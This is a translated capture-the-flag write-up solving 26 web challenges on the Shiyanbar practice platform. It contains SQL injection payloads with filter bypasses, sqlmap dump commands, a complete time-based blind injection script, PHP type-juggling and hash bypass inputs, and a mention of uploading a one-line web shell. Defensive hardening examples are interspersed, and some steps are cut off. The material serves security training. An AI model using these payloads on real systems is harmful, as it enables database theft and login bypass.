Shiyanbar (实验吧) web challenges (26/26): full writeup, super detailed :)

Source: Internet
Author: User
Tags: php, session, sha1, vars, hex code

# Simple SQL injection (简单的SQL注入)

http://www.shiyanbar.com/ctf/1875

1) Try id=1: no error.

2) Try id=1': error, and the message is echoed, which indicates an injection point:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

3) First guess that the back-end table is named flag, so the structure is union select flag from flag.

4) From step 2 the parameter sits inside single quotes, so after adding a ' the rest of the statement needs another ' to close it. The injection statement is:

?id=1' union select flag from flag where 't'='t

The echo is: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 't'='t' at line 1

Analysis: judging from the error, only the variable was filtered; the other keywords are not filtered.

5) Try writing the keywords from and where twice. The result is an error: ...corresponds to your MySQL server version for the right syntax to use near 'unionselectflag fromflag where 't'='t' at line 1. Spaces are filtered!

6) Use the + sign instead of a space: ?id=1'+union+select+flag+from+flag+where+'t'='t

# Simple SQL injection 2 (简单的SQL注入之2)

http://www.shiyanbar.com/ctf/1908

1. Normal display for id=1, id=2 and id=3; only three rows are shown.

2. id=1' shows a MySQL statement error, so the statement is roughly select name from user where id='input'.

3. id=1' with a space in the middle shows SQLi detected!, so spaces are filtered.

Combining these three displays, we can tell that the id=1 page plus our SQL statement can actually execute the injection we want.

Keep the simple judgment going.

id=1'%0band%0b'1'='1 (%0b stands in for a space; similar ones such as %0a-%0z, + and /**/ can be tried)

Shows normally:

Id:1' and '1'='1 name:baloteli

Continue testing.

It's good to find this logical trick.

?id=1'||'id'||' can display the data in the table. The statement then becomes select name from user where id='1'||'id'||'' and is closed. To show all the records in the table, add a few more ||'; as long as the statement is closed, it works.

Id:1'||'id'||' Name:baloteli
Id:1'||'id'||' Name:kanawaluo
Id:1'||'id'||' Name:dengdeng

Then, combining with web1, we can guess there is a flag table.

Find the hex-coded version and it's done.

?id=1'/*!u%6eion*//*!se%6cect*/flag/*!from*/flag/*!where*/'='

Get the flag directly.
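As an added example (not the source of either challenge above), here is the pattern the two writeups ran into, beside its fix. The blacklist version mirrors what was observed (spaces and a few keywords rejected, the value still concatenated into the query); the prepared-statement version keeps the value out of the SQL text entirely, and the same fix applies to the header-driven injection in "who is that you?" further down. Assumed: a PDO connection and a table user(id, name); the demo uses an in-memory SQLite database so it runs without MySQL.

```php
<?php
// Added example, not the challenge's code. Assumes a PDO connection $pdo and a
// table user(id INTEGER, name TEXT).

// Pattern A: keyword/space blacklist, then string concatenation. The check only
// looks at the text; the database still parses whatever reaches it, which is
// why the writeup could replace spaces with %0b, + or /**/ and still inject.
function lookup_blacklist(PDO $pdo, string $id): string
{
    if (preg_match('/\s|union|select|from|where/i', $id)) {
        return 'SQLi detected!';
    }
    $sql = "SELECT name FROM user WHERE id='" . $id . "'";   // $id is still part of the SQL text
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['name'] : 'no such user';
}

// Pattern B: a prepared statement. The value travels separately from the SQL
// text, so quotes, comments and keywords in $id are just data. The integer
// check on top is defence in depth: the page only ever expects a small id.
function lookup_prepared(PDO $pdo, string $id): string
{
    if (!ctype_digit($id)) {
        return 'bad id';
    }
    $stmt = $pdo->prepare('SELECT name FROM user WHERE id = :id');
    $stmt->execute([':id' => (int) $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['name'] : 'no such user';
}

// Constructed data (the three names from the writeup) in an in-memory SQLite DB.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE user (id INTEGER, name TEXT)');
$pdo->exec("INSERT INTO user VALUES (1, 'baloteli'), (2, 'kanawaluo'), (3, 'dengdeng')");

echo lookup_prepared($pdo, '1'), "\n";                   // baloteli
echo lookup_prepared($pdo, "1'/**/or/**/1"), "\n";       // bad id: rejected before any SQL is built
echo lookup_blacklist($pdo, "1'/**/or/**/'1'='1"), "\n"; // baloteli: blacklist passed, WHERE clause rewritten
```

The last line is the lesson of both challenges: a check that rejects visible spaces and keywords says nothing about what the database will parse, so the only reliable fix is to stop building the query from the input at all.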

# Simple SQL injection 3 (简单的SQL注入之3)

http://www.shiyanbar.com/ctf/1909

For this one I only used sqlmap to solve it.

1) Construct the sqlmap command: sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs

It ran all the way down and got the databases.

2) Construct again to get the current database: sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --current-db

3) Construct again to get the table names: sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --tables

4) Construct again to find the column names in the flag table: sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --columns -T "flag"

5) Construct the dump: sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dump -C "flag" -T "flag"

Tips: if sqlmap runs quickly, using sqlmap is recommended, but mastering manual injection is the kingly way.

# Of all martial arts, only speed is unbeatable (天下武功唯快不破)

http://www.shiyanbar.com/ctf/1854

First look at the source code.

Submit the key that was found as a POST and look at the request header.

The flag is found. Of course the key submitted as the parameter is the solution to the flag, but it must be fast, so only a script will do. The script is attached below:

```python
import requests
import base64

url = 'http://ctf5.shiyanbar.com/web/10/10.php'

# The FLAG response header carries the key, base64-encoded.
rs = requests.get(url).headers['FLAG']

v = base64.b64decode(rs).decode()

# Everything after the ':' is the key; it has to be posted back within the time limit.
print(requests.post(url=url, data={'key': v.split(':')[1]}).content)
```

Tips: if you lack the requests or base64 module, they can be downloaded with pip; if you do not have pip, refer to my previous blog.

# Beating around the bush (拐弯抹角)

http://www.shiyanbar.com/ctf/1846

According to the passage shown, add index.php after the URL to get the flag.

# Forms

http://www.shiyanbar.com/ctf/1819

F12 to view the source code first.

Find showsource with value 0, change it to 1, and get the hidden source code.

It shows:

```php
if ($a == -19827747736161128312837161661727773716166727272616149001823847)
```

Change the value of the PIN to

# Skynet management system (天网管理系统)

http://www.shiyanbar.com/ctf/1810

First right click to view the source (manual laugh).

Here we are asked to enter a string whose MD5 equals 0, which tests PHP weak typing. Here I provide 4 values that can pass:

Then search Baidu for MD5s starting with 0: http://www.mamicode.com/info-detail-1719711.html

Enter one of them in the user name field.

Then you know:

Open the link:

```php
$unserialize_str = $_POST['password'];
$data_unserialize = unserialize($unserialize_str);
if ($data_unserialize['user'] == '???' && $data_unserialize['pass'] == '???') {
    print_r($flag);
}
```

The great scientist PHP said: success is Boolean, failure is Boolean too. Go back, young man.

This code is not hard to understand: the password value submitted by POST is deserialized to get an array, and if the array's user and pass both satisfy the condition, the flag is printed. We do not know what '???' is, but we can notice that the judgment uses ==, which is again PHP weak typing:

```php
<?php if (true == "Pcat") { echo "OK"; } ?>
```

A bool true is equal, under weak typing, to any string, and when there is unserialize or json_decode in the code we can construct a bool to achieve the deception. Now we construct an array with 2 elements, user and pass, each a bool true, and get:

a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

(a means array, s represents string, b stands for bool, and the number represents the count/length)

Finally, submit it by POST in the password field.

# Once more

http://www.shiyanbar.com/ctf/1805

A simple code audit problem: according to the if statement, password must be greater than 9999999 and must also equal *-*.

OK, just construct the password: password=1e8%00*-*

(Note: if - is simply added to the number it becomes meaningless; after using %00 truncation, add *-*.)

Look back to get the flag, over!

# Guess Next Session

http://www.shiyanbar.com/ctf/1788

This challenge requires the Firefox browser and then a Firefox add-on, Cookie Manager+.

As usual, first look at the source code.

It indicates that the value obtained by GET must be equal to the value in the session.

Using Cookie Manager+, delete the PHP session cookie.

Then guess directly.

# FALSE

http://www.shiyanbar.com/ctf/1787

```php
<title>level1</title>
<link rel='stylesheet' href='style.css' type='text/css'>
<body>
<?php
require 'flag.php';
if (isset($_GET['name']) and isset($_GET['password'])) {
    if ($_GET['name'] == $_GET['password'])
        print 'Your password can not be your name.';
    else if (sha1($_GET['name']) === sha1($_GET['password']))
        die('Flag: '.$flag);
    else
        print '<p class="alert">Invalid password.</p>';
}
?>
<section class="login">
<div class="title">
<a href="./index.txt">level 1</a>
</div>
<form method="get">
<input type="text" required name="name" placeholder="name"/><br/>
<input type="text" required name="password" placeholder="password"/><br/>
<input type="submit"/>
</form>
</section>
</body>
```

Parsing the code logic: GET takes two fields, name and password, and the condition to get the flag is name != password and sha1(name) === sha1(password). At first glance this seems impossible, but the sha1() function can actually be used to bypass it. If the two fields are constructed as arrays, e.g. ?name[]=a&password[]=b, the two arrays are indeed different at the first judgment, but at the second judgment the sha1() function cannot handle the array type, returns false for both with an error, and the if condition holds. Get the flag.
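The three checks above (the bool from unserialize in 天网管理系统, the missing session value in Guess Next Session, and sha1() of an array in FALSE) are one defect: a loose or type-blind comparison on data whose type the client controls. The same null == '' rule is what the GROUP BY ... WITH ROLLUP trick in 因缺思厅的绕过 later relies on. As an added example, not code from any of the challenges, here is each check beside a version that requires strings and compares strictly. The expected credentials are placeholders.

```php
<?php
// Added example, not challenge code. Placeholders for the expected credentials.
const EXPECTED_USER = 'secret_user';
const EXPECTED_PASS = 'secret_pass';

// 1. Loose == against data from unserialize(). b:1 (bool true) == any
//    non-empty string is true, so the serialized payload from the writeup passes.
function check_loose(array $data): bool
{
    return $data['user'] == EXPECTED_USER && $data['pass'] == EXPECTED_PASS;
}

// Hardened: refuse anything that is not a string and compare strictly.
function check_strict(array $data): bool
{
    return isset($data['user'], $data['pass'])
        && is_string($data['user']) && is_string($data['pass'])
        && hash_equals(EXPECTED_USER, $data['user'])
        && hash_equals(EXPECTED_PASS, $data['pass']);
}

// 2. "Guess Next Session": with the session cookie deleted, $_SESSION holds no
//    value, and null == '' is true.
function session_check_loose(array $get, array $session): bool
{
    return ($get['password'] ?? null) == ($session['password'] ?? null);
}

function session_check_strict(array $get, array $session): bool
{
    return isset($get['password'], $session['password'])
        && is_string($get['password']) && is_string($session['password'])
        && hash_equals($session['password'], $get['password']);
}

// 3. "FALSE": sha1() on an array. PHP 5/7 emit a warning and return null, so
//    null === null holds; PHP 8 throws a TypeError instead.
function flag_check_loose($name, $password): bool
{
    if ($name == $password) {
        return false;
    }
    return @sha1($name) === @sha1($password);
}

function flag_check_strict($name, $password): bool
{
    if (!is_string($name) || !is_string($password) || $name === $password) {
        return false;
    }
    return hash_equals(sha1($name), sha1($password));
}

// Constructed inputs mirroring the writeup's payloads. allowed_classes => false
// also stops unserialize() from instantiating objects.
$payload = unserialize('a:2:{s:4:"user";b:1;s:4:"pass";b:1;}', ['allowed_classes' => false]);
var_dump(check_loose($payload));                        // bool(true)  bypassed
var_dump(check_strict($payload));                       // bool(false)

var_dump(session_check_loose(['password' => ''], []));  // bool(true)  bypassed
var_dump(session_check_strict(['password' => ''], [])); // bool(false)

try {
    var_dump(flag_check_loose(['a'], ['b']));           // PHP 7: bool(true) bypassed
} catch (TypeError $e) {
    echo "PHP 8 rejects the array: ", $e->getMessage(), "\n";
}
var_dump(flag_check_strict(['a'], ['b']));              // bool(false)
```

The pattern in every hardened version is the same: establish the type first (is_string), then compare with a strict, constant-time function (hash_equals), and never let == decide authentication.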

# Upload bypass (上传绕过)

http://www.shiyanbar.com/ctf/1781

Chopper with a one-line trojan, OK.

# what a fuck! What the hell is this?

http://www.shiyanbar.com/ctf/56

Very characteristic: jother encoding, a bunch of parentheses. It can be decoded online, but for an offline exam, in the Chrome browser press F12, there is a console; paste all the code, press Enter, and the key pops up.

# This looks a bit simple (这个看起来有点简单)

http://www.shiyanbar.com/ctf/33

Using SQL injection.

Union query:

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,1

Check the database:

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,SCHEMA_NAME%20from%20information_schema.SCHEMATA

Guess the table name:

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,TABLE_NAME%20from%20information_schema.TABLES

Guess the field:

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,COLUMN_NAME%20from%20information_schema.COLUMNS

k0y is the most suspicious, so submit:

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,k0y%20from%20thiskey

# A bit of a headache (头有点大)

http://www.shiyanbar.com/ctf/29

Firefox or Chrome, F12.

Click Edit and Resend, edit the request: modify the language, and add .NET Framework 9.9, that is, add .NET CLR 9.9 (with a semicolon).

Send and preview.

# Forbidden

http://www.shiyanbar.com/ctf/21

F12, select Network, then reload, click Edit and Resend.

Modify zh-CN to zh-HK.

The flag can be seen on the preview page after sending.

# Cat catches mouse (猫捉老鼠)

http://www.shiyanbar.com/ctf/20

Based on the topic "catch", use Burp Suite to grab the packet and send the captured data to Repeater.

Click Go directly, look at the response output, and find the following line in the response header hint.

After copying "mtq4odg2oda4ma==", replace the previous input 123 in Repeater, view the response, and find that the key has been obtained.

# Would you log in? (登录一下好吗?)

http://www.shiyanbar.com/ctf/1942

Explained below:

Evaluate username='TG': in general the database cannot contain my nickname (if it does, change the string), so here the return value is 0 (equivalent to false).
Then what is the result of 0 = ''? By now you probably see it too: it simply returns 1 (equivalent to true).

So this injection is equivalent to
SELECT * FROM user WHERE 1 and 1
which also equals SELECT * FROM user.
(This problem only filtered on the result having more than 3 rows to show the flag; it did not keep saying "sorry, no this user!!")

OK, to keep nagging: the comparison above is a weak-type comparison, and the following conditions will be true:
1='1'
1='1.0'
1='1 followed by a letter (and then a number is also fine)'
0='any string that does not start with a non-0 digit'
(Overall, as long as the front is 0, making the statement true is very simple, so for this question a universal password can be written in many ways following the above.)

# who is that you?

http://www.shiyanbar.com/ctf/1941

Time-based injection. If you don't know how, search Baidu; I'll go straight to the script without BB.

```python
import requests
import time
import sys

url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'


def retrivecurrentdatabase():
    index = 1
    result = ""

    # Read one character per outer iteration until a NUL byte marks the end.
    while '\x00' not in result:
        ascii_code = 0

        # Recover the character bit by bit: a slow response means the bit is set.
        for i in range(8):
            sql = ("222' and (case when (ascii(substring((select database()) from %d for 1)) & %d != 0) "
                   "then sleep(0.5) else sleep(0) end) and '1'='1" % (index, pow(2, i)))
            headers = {'x-forwarded-for': sql}
            start_time = time.time()
            requests.get(url, headers=headers)

            if (time.time() - start_time) > 0.5:
                ascii_code += pow(2, i)

        if chr(ascii_code) != '\x00':
            sys.stdout.write(chr(ascii_code))
        result += chr(ascii_code)

        index += 1

    return result


def retrivetable(database):
    database = "'" + database + "'"

    row = 0
    while True:
        index = 1
        result = ""

        while '\x00' not in result:
            ascii_code = 0

            for i in range(8):
                sql = ("222' and (case when (ascii(substring((select table_name from information_schema.tables "
                       "where table_schema=%s limit 1 offset %d) from %d for 1)) & %d != 0) "
                       "then sleep(0.5) else sleep(0) end) and '1'='1" % (database, row, index, pow(2, i)))
                headers = {'x-forwarded-for': sql}
                start_time = time.time()
                requests.get(url, headers=headers)

                if (time.time() - start_time) > 0.5:
                    ascii_code += pow(2, i)

            if chr(ascii_code) != '\x00':
                sys.stdout.write(chr(ascii_code))
            result += chr(ascii_code)

            index += 1

        # An empty name means there is no table at this offset: stop.
        if result == '\x00':
            break
        print('')
        row += 1


def dumpcolumn():
    row = 0
    while True:
        index = 1
        result = ""

        while '\x00' not in result:
            ascii_code = 0

            for i in range(8):
                sql = ("222' and (case when (ascii(substring((select flag from flag limit 1 offset %d) from %d for 1)) "
                       "& %d != 0) then sleep(0.5) else sleep(0) end) and '1'='1" % (row, index, pow(2, i)))
                headers = {'x-forwarded-for': sql}
                start_time = time.time()
                requests.get(url, headers=headers)

                if (time.time() - start_time) > 0.1:
                    ascii_code += pow(2, i)

            if chr(ascii_code) != '\x00':
                sys.stdout.write(chr(ascii_code))
            result += chr(ascii_code)

            index += 1

        if result == '\x00':
            break
        row += 1


def main():
    database = retrivecurrentdatabase()
    print('\ncurrent database is %s' % database)
    print("let's see the table name in the database!")
    database = database.replace("\x00", "")
    retrivetable(database)
    print("let's dump the flag!")
    sys.stdout.write("ctf{")
    dumpcolumn()
    sys.stdout.write("}")


if __name__ == '__main__':
    main()
```

# An interesting bypass (因缺思厅的绕过)

http://www.shiyanbar.com/ctf/1940

View the source to get this thing, then change the URL.

This comes out:

Here is the POST data check. This is not filtering in the narrow sense, just a check: if sensitive characters are found it outputs "water can carry a boat, and can also overturn it!" and ends.
The main checks are for "and", "select", "from", "where", "union", "join", "sleep", "benchmark", ",", "(", ")" and other things commonly used in SQL.

There is nothing to say about the database connection part. Next, $_POST['uname'] goes directly into the SQL query on the interest table. It verifies that the query result is one row, and if the pwd column of the query result compares equal to $_POST['pwd'], the flag is output.
The program seems quite simple and the logic is clear. To get the flag two conditions are judged: mysql_num_rows($query) == 1 and $key['pwd'] == $_POST['pwd'].
I believe some people run sqlmap straight away without even reading the code. After reading this code I don't recommend doing that; the benefit is very small. Look at the input check and you'll know.
Imagine that if you control the query result with union select, then $key['pwd'] and $_POST['pwd'] are both under our control, but the key to this path is getting through the input check. I tried a lot of methods by hand against the input check and found it in vain. Looking at the code again, I think this check method seems impossible to get past.
The strategy was then re-adjusted. There are two conditions to satisfy. The first condition is in fact easy to satisfy: x' or 1 limit passes the first check. Then look at the second check, $key['pwd'] == $_POST['pwd']. Because we can't get the data in the database (at least I can't), the only possibility is to control $key['pwd'] in this condition. I groped around for a long time, almost gave up, and asked Pcat whether there was anything to be done here. The answer was yes, with some hints. Finally I determined the target: make $key['pwd'] null. But the input check is very strict: commas, parentheses and so on are gone. To reach the goal I looked through the MySQL manual. The process was long, and not for lack of thought. The contents of the manual kept turning over in my mind during breakfast. After breakfast I thought of the thing to use: GROUP BY with ROLLUP.
x' or 1 group by pwd with rollup #

Finally, with pwd being NULL, the payload: x' or 1 group by pwd with rollup limit 1 offset

# Let me in (让我进去)

http://www.shiyanbar.com/ctf/1848

Hash length extension attack. For the principle, search Baidu; I won't BB about it here.

Recommended first look at this link: http://www.cnblogs.com/pcat/p/5478509.html

This method has been introduced in detail there, so I will not repeat it.

# Forgot the password (忘记密码了)

http://www.shiyanbar.com/ctf/1808

First Ctrl+U to view the page source: you can see the admin "[email protected]" and that the editor is Vim.

Randomly enter one; a JS box pops up saying the password is in step2.php. Then open step2.php directly and find it jumps back to step.php. Forget it, just use Fiddler to look: sure enough it is a 302 redirect. Then visit step2.php; in fact it has a built-in [email protected] that is sent to submit.php. Then we revisit submit.php, which shows "you're not a admin".

This method does not work. Looking at other people's writeups, they said that Vim produces temporary files. Then we access .submit.php.swp in the browser, and sure enough the file is there. Although it is garbled, the code can barely be read. What is needed here are the two parameters emailAddress and token. emailAddress is just that, and token is judged: it must be 0 and have length 10.

Change the URL: http://ctf5.shiyanbar.com/10/upload/[email protected]&token=0000000000

# NSCTF web200

http://www.shiyanbar.com/ctf/1760

The topic is a PHP encryption; we just reverse it:

```php
<?php
// Ciphertext as printed on the page (letter case may have been altered by the page's extraction).
$DD = "A1zlbgqsceseiqrlwuqaymwlyq2l5vwbxqga3rqayumz0tmmvsgm2zwb4tws";
$s = str_rot13($DD);
$a = strrev($s);
$b = base64_decode($a);
$aa = '';
for ($e = 0; $e < strlen($b); $e++) {
    $g = substr($b, $e, 1);
    $temp = ord($g) - 1;   // shift each byte back by one
    $g = chr($temp);
    $aa = $aa . $g;
}
echo strrev($aa);
?>
```

# Program logic problem (程序逻辑问题)

Http://www.shiyanbar.com/ctf/62

This problem still had me stuck for hours.

The final payload:

user=1 union select concat('bcbe3365e6ac95ea2c0343a2395834dd')%23&pass=222

At first I thought it was an injection, and in the end I injected and found the pw field is 111.

So I tried weak typing and found nothing soft.

Finally I thought of a union query:

select username from admin where id=-1 union select concat('bcbe3365e6ac95ea2c0343a2395834dd')

Principle: when no user with id -1 is displayed, the union statement returns bcbe3365e6ac95ea2c0343a2395834dd,

the MD5 of 222.

At the same time, submit pass=222 to get the flag.

# The PHP way (PHP大法)

http://www.shiyanbar.com/ctf/54

You can tell by reading the code in http://ctf5.shiyanbar.com/DUTCTF/index.php.txt

If id equals "hackerDJ", the flag is not given, but after decoding "hackerDJ" is required.

So the first decoding must not be "hackerDJ" and the second must be "hackerDJ", so just encode twice.

(No need to encode everything; just pick one letter, e.g. the last j -> %254a.)

http://ctf5.shiyanbar.com/DUTCTF/index.php?id=hackerD%254A
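As an added example (a model, not the challenge's own index.php), here is the ordering bug the trick above depends on beside the corrected order. PHP decodes the query string once when it fills $_GET, so the server sees hackerD%4A for ?id=hackerD%254A; a check on that value passes, and only the second urldecode() turns it into hackerDJ. The function names and return strings are assumptions.

```php
<?php
// Added example, not the challenge code. Models: deny-list check on the raw
// value, then a second urldecode().
function gate_vulnerable(string $id): string
{
    if ($id === 'hackerDJ') {
        return 'not allowed';            // check runs on the still-encoded value
    }
    $id = urldecode($id);                // canonicalisation happens after the check
    return $id === 'hackerDJ' ? 'access granted' : 'wrong id';
}

// Fixed ordering: bring the value into canonical form first, then apply every
// check to that form. (If the application does not expect doubly-encoded
// input, the right move is to not call urldecode() on $_GET at all.)
function gate_fixed(string $id): string
{
    $canonical = urldecode($id);
    if ($canonical === 'hackerDJ') {
        return 'not allowed';
    }
    return 'wrong id';
}

// What the server sees for ?id=hackerD%254A after PHP's own single decode:
$seen = 'hackerD%4A';
echo gate_vulnerable($seen), "\n";   // access granted
echo gate_fixed($seen), "\n";        // not allowed
echo gate_fixed('hackerDJ'), "\n";   // not allowed
```

The general rule this illustrates: decode, normalise and canonicalise input exactly once, before any validation, and never validate one representation while acting on another.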

# Seems a bit hard (貌似有点难)

http://www.shiyanbar.com/ctf/32

Open Burp, intercept a request, add an X- field with 1.1.1.1 to the HTTP header, and forward.

Then you can see the key.

# Looks a bit hard (看起来有点难)

http://www.shiyanbar.com/ctf/2

SQL injection, very simple, but it runs slowly; surprisingly it is worth 50 points, and I don't know what is extraordinary about it.

The question itself is no problem; it is just there to frighten people. That is how it should be: believe in yourself and don't be confused by what is in front of you.

For the record.
